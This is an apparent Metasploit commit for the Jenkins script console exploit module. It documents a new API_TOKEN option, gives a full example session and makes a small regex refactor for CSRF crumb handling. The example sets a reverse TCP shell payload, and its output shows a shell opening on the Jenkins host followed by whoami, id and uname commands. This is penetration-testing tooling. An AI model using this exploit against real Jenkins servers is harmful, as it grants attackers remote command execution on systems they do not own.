Added docs, minor code tweak to remove duplication.

pbarry-r7 · pbarry-r7 · commit 58cd4321204b · 2017-06-19T17:35:41.000-05:00
diff --git a/documentation/modules/exploit/multi/http/jenkins_script_console.md b/documentation/modules/exploit/multi/http/jenkins_script_console.md
@@ -36,7 +36,13 @@
 
   A password to an account that has access to the script console. This is only
   necessary if the Jenkins instance has been configured to require
-  authentication.
+  authentication and you aren't using an API_TOKEN (see below).
+
+  **API_TOKEN**
+
+  An API token to an account that has access to the script console. This is only
+  necessary if the Jenkins instance has been configured to require
+  authentication and you aren't using a PASSWORD (see above).
 
 ## Scenarios
 
@@ -128,3 +134,42 @@
   meterpreter >
 
   ```
+
+  Example usage against a Linux x64 bit target running Jenkins 2.46.3.
+
+  ```
+  msf > use exploit/multi/http/jenkins_script_console
+  msf exploit(jenkins_script_console) > set RHOST 172.17.0.1
+  RHOST => 172.17.0.1
+  msf exploit(jenkins_script_console) > set RPORT 8080
+  RPORT => 8080
+  msf exploit(jenkins_script_console) > set TARGETURI /
+  TARGETURI => /
+  msf exploit(jenkins_script_console) > set USERNAME admin
+  USERNAME => admin
+  msf exploit(jenkins_script_console) > set API_TOKEN 24e0b80d009ed12590ff85866d88c00d
+  API_TOKEN => 24e0b80d009ed12590ff85866d88c00d
+  msf exploit(jenkins_script_console) > set TARGET 1
+  TARGET => 1
+  msf exploit(jenkins_script_console) > set PAYLOAD linux/x86/shell/reverse_tcp
+  PAYLOAD => linux/x86/shell/reverse_tcp
+  msf exploit(jenkins_script_console) > set LHOST 10.0.2.4
+  LHOST => 10.0.2.4
+  msf exploit(jenkins_script_console) > exploit
+
+  [*] Started reverse TCP handler on 10.0.2.4:4444 
+  [*] Checking access to the script console
+  [*] Authenticating with token...
+  [*] Using CSRF token: 'd41639a6f5721760a8ee3df5d6a71eec' (Jenkins-Crumb style)
+  [*] 172.17.0.1:8080 - Sending Linux stager...
+  [*] Sending stage (36 bytes) to 172.17.0.2
+  [*] Command shell session 1 opened (10.0.2.4:4444 -> 172.17.0.2:53962) at 2017-06-19 16:55:42 -0500
+  [!] Deleting /tmp/AsqL5Pg payload file
+
+  whoami
+  jenkins
+  id
+  uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
+  uname -a
+  Linux b4b4e715101e 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 GNU/Linux
+  ```
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -193,10 +193,7 @@ def exploit
     if res.body =~ /"\.crumb", "([a-z0-9]*)"/
       print_status("Using CSRF token: '#{$1}' (.crumb style)")
       @crumb = {:name => '.crumb', :value => $1}
-    elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/
-      print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
-      @crumb = {:name => 'Jenkins-Crumb', :value => $1}
-    elsif res.body =~ /"crumb":"([a-z0-9]*)"/
+    elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/ || res.body =~ /"crumb":"([a-z0-9]*)"/
       print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
       @crumb = {:name => 'Jenkins-Crumb', :value => $1}
     end
